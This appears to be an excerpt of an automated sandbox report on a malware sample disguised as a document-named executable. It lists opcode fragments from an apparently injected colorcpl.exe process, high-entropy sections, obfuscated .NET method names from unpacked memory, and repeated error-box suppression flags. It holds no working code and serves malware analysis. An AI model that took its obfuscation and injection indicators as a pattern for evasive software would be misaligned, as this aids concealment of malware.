Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051C283D push eax; iretd	7_2_051C2858
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0330221C push esi; ret	7_2_03302274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0330220A push esi; ret	7_2_03302274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0330224F push esi; ret	7_2_03302274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0330C156 push ss; retf	7_2_0330C158
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_033021F5 push esi; ret	7_2_03302274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_032F88BD push eax; ret	7_2_032F88BE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_032F2EE2 push ss; retf	7_2_032F2EED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0330EDE0 push edi; retf	7_2_0330EDE8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_032F344A push edx; iretd	7_2_032F344C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_032F1B5A push ebx; iretd	7_2_032F1B65
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0551C447 push cs; ret	7_2_0551C44B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0551019B pushfd ; iretd	7_2_0551019C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05513D46 pushad ; ret	7_2_05513D47
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0551CF48 push ebx; iretd	7_2_0551CF49

Source: 18in SPA-198-2024.exe

Static PE information: section name: .text entropy: 7.805014329247597

Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, EYZf1BVBlUIdgVOkxp.cs	High entropy of concatenated method names: 'LZn5TlPioI', 'NNv59raBWU', 'UL5jd6y7CU', 'cWnjDW859J', 'HIqjSChVRr', 'iO9jvNB4xF', 'vHGjGXj2dP', 'GMJj7wciiY', 'MScj6HbFWk', 'gLdjpkpo8f'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, ITm1vDuxd8RRc9FmM9.cs	High entropy of concatenated method names: 'zAQRn5rjar', 'MirRNKUn16', 'OKHRjleuBC', 'Xr0R5XW16h', 'FvXRqEtahP', 'OC3RkpLXU4', 'YfMR1LjXHk', 'GjvRKnwJ48', 'WL3RrqAe32', 'VeVRm9krDd'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, vYAvVI0RBteOh8J0bu.cs	High entropy of concatenated method names: 'egNgpEYUBE', 'zw1gPGXUe6', 'wSKg0ufEBM', 'femgl2AJtZ', 'Bamgs6YKGY', 'AV4gdAxm8f', 'nYKgD8GohQ', 'L6xgS6dHNM', 'JHSgv7xiHi', 'iQ2gGcM96c'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, tfu54QQB1LN3Ms64Et.cs	High entropy of concatenated method names: 'idLIkLHKqj', 'VtRI1J6bmY', 'JDrIrC9SVB', 'yMEImeUYZf', 'FOkIgxpVV9', 'x9gIFVejx6', 'hHpD9KoDdKpSZPtcaq', 'QAoRPDcSPwyUIU25Ns', 'tC2IIFcTM2', 'bJeIxMVPCK'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	High entropy of concatenated method names: 'WT5xbCVukZ', 'IWaxni1F80', 'ur9xNOkxps', 'LuxxjIbRLy', 'K3Dx5BMhcP', 'zZdxqWI77V', 'tNoxkq029D', 'mRkx1Hgv3p', 'mDvxKGlJF6', 'MFBxrCvxmw'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, rBi4mna82yfoVKeIX4.cs	High entropy of concatenated method names: 'I42euSWOG4', 'xlLeMBv81y', 'nI7ROldTyK', 'xKrRI3VWPS', 'RuDeJviLnI', 'bnMeP8nUPF', 'cmfe4bt7i3', 'Jgde0RN5PH', 'KTSeloH3YO', 'FvKewWa2LY'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, xqZ7CSMfYruwuEEAOs.cs	High entropy of concatenated method names: 'QkDHIWIwSI', 'Xo0HxMsO86', 'Ws7HQVfJjK', 'zglHnqVJiu', 'q0aHNJrfqf', 'c3KH5qn7eQ', 'JmFHqBfgDt', 'ltRRXZvFYx', 'mIyRuxoBLa', 'LOdRtobKfP'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, FV9c9gCVejx6fBgfjq.cs	High entropy of concatenated method names: 'R5aqb4xM4F', 'tSxqN2qUKt', 'VQGq5gh7uE', 'QxOqkZi3TC', 'ORwq174Isd', 'WZn5ZTZMu9', 'DeH5aAGdTJ', 'Te25XmvuZc', 'jFl5ulmeIV', 'lOy5tRIQ1S'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, hMil0iIxjNOw3HhNatX.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QVGo0Bqsla', 'QW4ol9Mgjp', 'o2jowkhkDa', 'eoIoEHE1NM', 'IeNoZByFEQ', 'weBoa1wfDC', 'Yk5oX6Juut'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, oeQTW92UgH2ooeP3SY.cs	High entropy of concatenated method names: 'Xcw396mt0', 'tdqLUMv9Q', 'nH1hSOZEt', 'R679w30Ht', 'yhtUO0Rij', 'A7GVsejPE', 'suHrYvfQsVoxFQu8rO', 'sVDU3y6X2SGmfclgvZ', 'feiRfSdv4', 'Q7XonikCp'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, PjZYa7IICUMqel4FibB.cs	High entropy of concatenated method names: 'ToString', 'xBioxVu5TL', 'ckhoQyNlG1', 'LlHobYYnf2', 'XMronPcwqZ', 'fPjoNU1OL3', 'cXKojkeZtu', 'Ow6o5s3wrL', 'FkkiPKKXrej7sFEVkqv', 'PQTCR2KLyloHvv5p9DH'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, zLHKqjWatRJ6bmYn2g.cs	High entropy of concatenated method names: 'E9ZN0xd1YS', 'swONlSeVOQ', 'cCjNwfAv00', 'x2FNEFPXKu', 'NXtNZwJFVH', 'AESNaf4lso', 'KXbNXk4OkR', 'AxJNub2nWA', 'ymCNtOSjCI', 'kLoNMAxuIV'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, mF13sSUDrC9SVB8MEe.cs	High entropy of concatenated method names: 'NEAjLW9s7r', 'Vvkjhk329O', 'bxZjWsLix6', 'pFpjUNUogq', 'ANXjgsxXnB', 'pjDjFIyxNo', 'A8njeMIO1L', 'MjcjRUvVmU', 'S4JjHwbgtQ', 'gdyjoUZixv'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, KN2Ad8tHJFhl5JDVxp.cs	High entropy of concatenated method names: 'WFLRCylCmY', 'QHQRsYHOSZ', 'v46RdWmkAN', 'yhuRDGW55H', 'TrlR0SwUAw', 'o5aRS36E4W', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, pssBojGTjgJe70oti5.cs	High entropy of concatenated method names: 'Sd8knl0fcD', 'UBhkjvV2AD', 'aCJkqqQjYr', 'ugrqMdl72S', 'rrGqztyHRZ', 'EotkOPpE1r', 'RLekIP6Nct', 'Kcok2A0wBr', 'VnfkxjHXsb', 'jM5kQqoDJL'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, kL7NDV4rIWAXTBk6wb.cs	High entropy of concatenated method names: 'yv5iWrKUGQ', 'IPPiUYFCmc', 'tYWiCeq3sW', 'kxZisdmq0P', 'tXCiDpSbXQ', 'e11iSjKBBM', 'y44iGxc7KY', 'gwTi7IyHkT', 'wuQipChybD', 'qHUiJmTwYx'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, nLmKepIO9XravPCTaGP.cs	High entropy of concatenated method names: 'YFLHcsqftP', 'aUKH8BE8NL', 'mSpH3HMlqt', 'SuxHLYMKtZ', 'eV0HTHKkKv', 'Fr0Hhe0AEf', 'IZKH9ZukgI', 'WEUHW4GleN', 'Y3BHUTToGw', 'F5rHVcW2c5'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, OcMcBJEaukSEJBahQ9.cs	High entropy of concatenated method names: 'auJer09phu', 'fI7emcnE6e', 'ToString', 'xkjenPcYIu', 'ekSeNP22gn', 'IJ4ejprklr', 'Dxee5Uu8BD', 'mGPeqQFD16', 'DCYeksyP1v', 'TyHe1mfHQV'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, qfoPjU6bBvLtRFNxR6.cs	High entropy of concatenated method names: 'sFCkcCvHQ2', 'dCqk8epRQW', 'dOdk3r6UAC', 'vPqkLgZ3tk', 'vXIkTjYr2X', 'OvCkhcdDc2', 'Jynk9dvq1k', 'rgLkWb49ol', 'IBJkUvfGXj', 'd7qkVMd1ey'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, yb2okLzZ0im5gYCiCP.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QG0HiFHVBU', 'ovoHgttlyb', 'UQ0HFEQyoN', 'soKHeUgQJH', 'ukSHRTcx29', 'd2cHHone3H', 'A31HoBHR7Y'
Source: 0.2.18in SPA-198-2024.exe.40b8580.3.raw.unpack, F5O936N4KqAUPM287L.cs	High entropy of concatenated method names: 'Dispose', 'dANItEJwnU', 'Vsg2sal0JR', 'BGqLLnBftx', 'bDTIMm1vDx', 'H8RIzRc9Fm', 'ProcessDialogKey', 'Y9v2ON2Ad8', 'sJF2Ihl5JD', 'Fxp22YqZ7C'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, EYZf1BVBlUIdgVOkxp.cs	High entropy of concatenated method names: 'LZn5TlPioI', 'NNv59raBWU', 'UL5jd6y7CU', 'cWnjDW859J', 'HIqjSChVRr', 'iO9jvNB4xF', 'vHGjGXj2dP', 'GMJj7wciiY', 'MScj6HbFWk', 'gLdjpkpo8f'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, ITm1vDuxd8RRc9FmM9.cs	High entropy of concatenated method names: 'zAQRn5rjar', 'MirRNKUn16', 'OKHRjleuBC', 'Xr0R5XW16h', 'FvXRqEtahP', 'OC3RkpLXU4', 'YfMR1LjXHk', 'GjvRKnwJ48', 'WL3RrqAe32', 'VeVRm9krDd'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, vYAvVI0RBteOh8J0bu.cs	High entropy of concatenated method names: 'egNgpEYUBE', 'zw1gPGXUe6', 'wSKg0ufEBM', 'femgl2AJtZ', 'Bamgs6YKGY', 'AV4gdAxm8f', 'nYKgD8GohQ', 'L6xgS6dHNM', 'JHSgv7xiHi', 'iQ2gGcM96c'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, tfu54QQB1LN3Ms64Et.cs	High entropy of concatenated method names: 'idLIkLHKqj', 'VtRI1J6bmY', 'JDrIrC9SVB', 'yMEImeUYZf', 'FOkIgxpVV9', 'x9gIFVejx6', 'hHpD9KoDdKpSZPtcaq', 'QAoRPDcSPwyUIU25Ns', 'tC2IIFcTM2', 'bJeIxMVPCK'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	High entropy of concatenated method names: 'WT5xbCVukZ', 'IWaxni1F80', 'ur9xNOkxps', 'LuxxjIbRLy', 'K3Dx5BMhcP', 'zZdxqWI77V', 'tNoxkq029D', 'mRkx1Hgv3p', 'mDvxKGlJF6', 'MFBxrCvxmw'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, rBi4mna82yfoVKeIX4.cs	High entropy of concatenated method names: 'I42euSWOG4', 'xlLeMBv81y', 'nI7ROldTyK', 'xKrRI3VWPS', 'RuDeJviLnI', 'bnMeP8nUPF', 'cmfe4bt7i3', 'Jgde0RN5PH', 'KTSeloH3YO', 'FvKewWa2LY'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, xqZ7CSMfYruwuEEAOs.cs	High entropy of concatenated method names: 'QkDHIWIwSI', 'Xo0HxMsO86', 'Ws7HQVfJjK', 'zglHnqVJiu', 'q0aHNJrfqf', 'c3KH5qn7eQ', 'JmFHqBfgDt', 'ltRRXZvFYx', 'mIyRuxoBLa', 'LOdRtobKfP'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, FV9c9gCVejx6fBgfjq.cs	High entropy of concatenated method names: 'R5aqb4xM4F', 'tSxqN2qUKt', 'VQGq5gh7uE', 'QxOqkZi3TC', 'ORwq174Isd', 'WZn5ZTZMu9', 'DeH5aAGdTJ', 'Te25XmvuZc', 'jFl5ulmeIV', 'lOy5tRIQ1S'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, hMil0iIxjNOw3HhNatX.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QVGo0Bqsla', 'QW4ol9Mgjp', 'o2jowkhkDa', 'eoIoEHE1NM', 'IeNoZByFEQ', 'weBoa1wfDC', 'Yk5oX6Juut'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, oeQTW92UgH2ooeP3SY.cs	High entropy of concatenated method names: 'Xcw396mt0', 'tdqLUMv9Q', 'nH1hSOZEt', 'R679w30Ht', 'yhtUO0Rij', 'A7GVsejPE', 'suHrYvfQsVoxFQu8rO', 'sVDU3y6X2SGmfclgvZ', 'feiRfSdv4', 'Q7XonikCp'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, PjZYa7IICUMqel4FibB.cs	High entropy of concatenated method names: 'ToString', 'xBioxVu5TL', 'ckhoQyNlG1', 'LlHobYYnf2', 'XMronPcwqZ', 'fPjoNU1OL3', 'cXKojkeZtu', 'Ow6o5s3wrL', 'FkkiPKKXrej7sFEVkqv', 'PQTCR2KLyloHvv5p9DH'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, zLHKqjWatRJ6bmYn2g.cs	High entropy of concatenated method names: 'E9ZN0xd1YS', 'swONlSeVOQ', 'cCjNwfAv00', 'x2FNEFPXKu', 'NXtNZwJFVH', 'AESNaf4lso', 'KXbNXk4OkR', 'AxJNub2nWA', 'ymCNtOSjCI', 'kLoNMAxuIV'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, mF13sSUDrC9SVB8MEe.cs	High entropy of concatenated method names: 'NEAjLW9s7r', 'Vvkjhk329O', 'bxZjWsLix6', 'pFpjUNUogq', 'ANXjgsxXnB', 'pjDjFIyxNo', 'A8njeMIO1L', 'MjcjRUvVmU', 'S4JjHwbgtQ', 'gdyjoUZixv'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, KN2Ad8tHJFhl5JDVxp.cs	High entropy of concatenated method names: 'WFLRCylCmY', 'QHQRsYHOSZ', 'v46RdWmkAN', 'yhuRDGW55H', 'TrlR0SwUAw', 'o5aRS36E4W', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, pssBojGTjgJe70oti5.cs	High entropy of concatenated method names: 'Sd8knl0fcD', 'UBhkjvV2AD', 'aCJkqqQjYr', 'ugrqMdl72S', 'rrGqztyHRZ', 'EotkOPpE1r', 'RLekIP6Nct', 'Kcok2A0wBr', 'VnfkxjHXsb', 'jM5kQqoDJL'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, kL7NDV4rIWAXTBk6wb.cs	High entropy of concatenated method names: 'yv5iWrKUGQ', 'IPPiUYFCmc', 'tYWiCeq3sW', 'kxZisdmq0P', 'tXCiDpSbXQ', 'e11iSjKBBM', 'y44iGxc7KY', 'gwTi7IyHkT', 'wuQipChybD', 'qHUiJmTwYx'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, nLmKepIO9XravPCTaGP.cs	High entropy of concatenated method names: 'YFLHcsqftP', 'aUKH8BE8NL', 'mSpH3HMlqt', 'SuxHLYMKtZ', 'eV0HTHKkKv', 'Fr0Hhe0AEf', 'IZKH9ZukgI', 'WEUHW4GleN', 'Y3BHUTToGw', 'F5rHVcW2c5'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, OcMcBJEaukSEJBahQ9.cs	High entropy of concatenated method names: 'auJer09phu', 'fI7emcnE6e', 'ToString', 'xkjenPcYIu', 'ekSeNP22gn', 'IJ4ejprklr', 'Dxee5Uu8BD', 'mGPeqQFD16', 'DCYeksyP1v', 'TyHe1mfHQV'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, qfoPjU6bBvLtRFNxR6.cs	High entropy of concatenated method names: 'sFCkcCvHQ2', 'dCqk8epRQW', 'dOdk3r6UAC', 'vPqkLgZ3tk', 'vXIkTjYr2X', 'OvCkhcdDc2', 'Jynk9dvq1k', 'rgLkWb49ol', 'IBJkUvfGXj', 'd7qkVMd1ey'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, yb2okLzZ0im5gYCiCP.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QG0HiFHVBU', 'ovoHgttlyb', 'UQ0HFEQyoN', 'soKHeUgQJH', 'ukSHRTcx29', 'd2cHHone3H', 'A31HoBHR7Y'
Source: 0.2.18in SPA-198-2024.exe.7450000.5.raw.unpack, F5O936N4KqAUPM287L.cs	High entropy of concatenated method names: 'Dispose', 'dANItEJwnU', 'Vsg2sal0JR', 'BGqLLnBftx', 'bDTIMm1vDx', 'H8RIzRc9Fm', 'ProcessDialogKey', 'Y9v2ON2Ad8', 'sJF2Ihl5JD', 'Fxp22YqZ7C'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, EYZf1BVBlUIdgVOkxp.cs	High entropy of concatenated method names: 'LZn5TlPioI', 'NNv59raBWU', 'UL5jd6y7CU', 'cWnjDW859J', 'HIqjSChVRr', 'iO9jvNB4xF', 'vHGjGXj2dP', 'GMJj7wciiY', 'MScj6HbFWk', 'gLdjpkpo8f'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, ITm1vDuxd8RRc9FmM9.cs	High entropy of concatenated method names: 'zAQRn5rjar', 'MirRNKUn16', 'OKHRjleuBC', 'Xr0R5XW16h', 'FvXRqEtahP', 'OC3RkpLXU4', 'YfMR1LjXHk', 'GjvRKnwJ48', 'WL3RrqAe32', 'VeVRm9krDd'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, vYAvVI0RBteOh8J0bu.cs	High entropy of concatenated method names: 'egNgpEYUBE', 'zw1gPGXUe6', 'wSKg0ufEBM', 'femgl2AJtZ', 'Bamgs6YKGY', 'AV4gdAxm8f', 'nYKgD8GohQ', 'L6xgS6dHNM', 'JHSgv7xiHi', 'iQ2gGcM96c'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, tfu54QQB1LN3Ms64Et.cs	High entropy of concatenated method names: 'idLIkLHKqj', 'VtRI1J6bmY', 'JDrIrC9SVB', 'yMEImeUYZf', 'FOkIgxpVV9', 'x9gIFVejx6', 'hHpD9KoDdKpSZPtcaq', 'QAoRPDcSPwyUIU25Ns', 'tC2IIFcTM2', 'bJeIxMVPCK'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, dWr9Yd1rel0FF9GRB2.cs	High entropy of concatenated method names: 'WT5xbCVukZ', 'IWaxni1F80', 'ur9xNOkxps', 'LuxxjIbRLy', 'K3Dx5BMhcP', 'zZdxqWI77V', 'tNoxkq029D', 'mRkx1Hgv3p', 'mDvxKGlJF6', 'MFBxrCvxmw'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, rBi4mna82yfoVKeIX4.cs	High entropy of concatenated method names: 'I42euSWOG4', 'xlLeMBv81y', 'nI7ROldTyK', 'xKrRI3VWPS', 'RuDeJviLnI', 'bnMeP8nUPF', 'cmfe4bt7i3', 'Jgde0RN5PH', 'KTSeloH3YO', 'FvKewWa2LY'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, xqZ7CSMfYruwuEEAOs.cs	High entropy of concatenated method names: 'QkDHIWIwSI', 'Xo0HxMsO86', 'Ws7HQVfJjK', 'zglHnqVJiu', 'q0aHNJrfqf', 'c3KH5qn7eQ', 'JmFHqBfgDt', 'ltRRXZvFYx', 'mIyRuxoBLa', 'LOdRtobKfP'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, FV9c9gCVejx6fBgfjq.cs	High entropy of concatenated method names: 'R5aqb4xM4F', 'tSxqN2qUKt', 'VQGq5gh7uE', 'QxOqkZi3TC', 'ORwq174Isd', 'WZn5ZTZMu9', 'DeH5aAGdTJ', 'Te25XmvuZc', 'jFl5ulmeIV', 'lOy5tRIQ1S'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, hMil0iIxjNOw3HhNatX.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QVGo0Bqsla', 'QW4ol9Mgjp', 'o2jowkhkDa', 'eoIoEHE1NM', 'IeNoZByFEQ', 'weBoa1wfDC', 'Yk5oX6Juut'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, oeQTW92UgH2ooeP3SY.cs	High entropy of concatenated method names: 'Xcw396mt0', 'tdqLUMv9Q', 'nH1hSOZEt', 'R679w30Ht', 'yhtUO0Rij', 'A7GVsejPE', 'suHrYvfQsVoxFQu8rO', 'sVDU3y6X2SGmfclgvZ', 'feiRfSdv4', 'Q7XonikCp'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, PjZYa7IICUMqel4FibB.cs	High entropy of concatenated method names: 'ToString', 'xBioxVu5TL', 'ckhoQyNlG1', 'LlHobYYnf2', 'XMronPcwqZ', 'fPjoNU1OL3', 'cXKojkeZtu', 'Ow6o5s3wrL', 'FkkiPKKXrej7sFEVkqv', 'PQTCR2KLyloHvv5p9DH'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, zLHKqjWatRJ6bmYn2g.cs	High entropy of concatenated method names: 'E9ZN0xd1YS', 'swONlSeVOQ', 'cCjNwfAv00', 'x2FNEFPXKu', 'NXtNZwJFVH', 'AESNaf4lso', 'KXbNXk4OkR', 'AxJNub2nWA', 'ymCNtOSjCI', 'kLoNMAxuIV'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, mF13sSUDrC9SVB8MEe.cs	High entropy of concatenated method names: 'NEAjLW9s7r', 'Vvkjhk329O', 'bxZjWsLix6', 'pFpjUNUogq', 'ANXjgsxXnB', 'pjDjFIyxNo', 'A8njeMIO1L', 'MjcjRUvVmU', 'S4JjHwbgtQ', 'gdyjoUZixv'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, KN2Ad8tHJFhl5JDVxp.cs	High entropy of concatenated method names: 'WFLRCylCmY', 'QHQRsYHOSZ', 'v46RdWmkAN', 'yhuRDGW55H', 'TrlR0SwUAw', 'o5aRS36E4W', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, pssBojGTjgJe70oti5.cs	High entropy of concatenated method names: 'Sd8knl0fcD', 'UBhkjvV2AD', 'aCJkqqQjYr', 'ugrqMdl72S', 'rrGqztyHRZ', 'EotkOPpE1r', 'RLekIP6Nct', 'Kcok2A0wBr', 'VnfkxjHXsb', 'jM5kQqoDJL'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, kL7NDV4rIWAXTBk6wb.cs	High entropy of concatenated method names: 'yv5iWrKUGQ', 'IPPiUYFCmc', 'tYWiCeq3sW', 'kxZisdmq0P', 'tXCiDpSbXQ', 'e11iSjKBBM', 'y44iGxc7KY', 'gwTi7IyHkT', 'wuQipChybD', 'qHUiJmTwYx'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, nLmKepIO9XravPCTaGP.cs	High entropy of concatenated method names: 'YFLHcsqftP', 'aUKH8BE8NL', 'mSpH3HMlqt', 'SuxHLYMKtZ', 'eV0HTHKkKv', 'Fr0Hhe0AEf', 'IZKH9ZukgI', 'WEUHW4GleN', 'Y3BHUTToGw', 'F5rHVcW2c5'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, OcMcBJEaukSEJBahQ9.cs	High entropy of concatenated method names: 'auJer09phu', 'fI7emcnE6e', 'ToString', 'xkjenPcYIu', 'ekSeNP22gn', 'IJ4ejprklr', 'Dxee5Uu8BD', 'mGPeqQFD16', 'DCYeksyP1v', 'TyHe1mfHQV'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, qfoPjU6bBvLtRFNxR6.cs	High entropy of concatenated method names: 'sFCkcCvHQ2', 'dCqk8epRQW', 'dOdk3r6UAC', 'vPqkLgZ3tk', 'vXIkTjYr2X', 'OvCkhcdDc2', 'Jynk9dvq1k', 'rgLkWb49ol', 'IBJkUvfGXj', 'd7qkVMd1ey'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, yb2okLzZ0im5gYCiCP.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QG0HiFHVBU', 'ovoHgttlyb', 'UQ0HFEQyoN', 'soKHeUgQJH', 'ukSHRTcx29', 'd2cHHone3H', 'A31HoBHR7Y'
Source: 0.2.18in SPA-198-2024.exe.4030760.1.raw.unpack, F5O936N4KqAUPM287L.cs	High entropy of concatenated method names: 'Dispose', 'dANItEJwnU', 'Vsg2sal0JR', 'BGqLLnBftx', 'bDTIMm1vDx', 'H8RIzRc9Fm', 'ProcessDialogKey', 'Y9v2ON2Ad8', 'sJF2Ihl5JD', 'Fxp22YqZ7C'

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
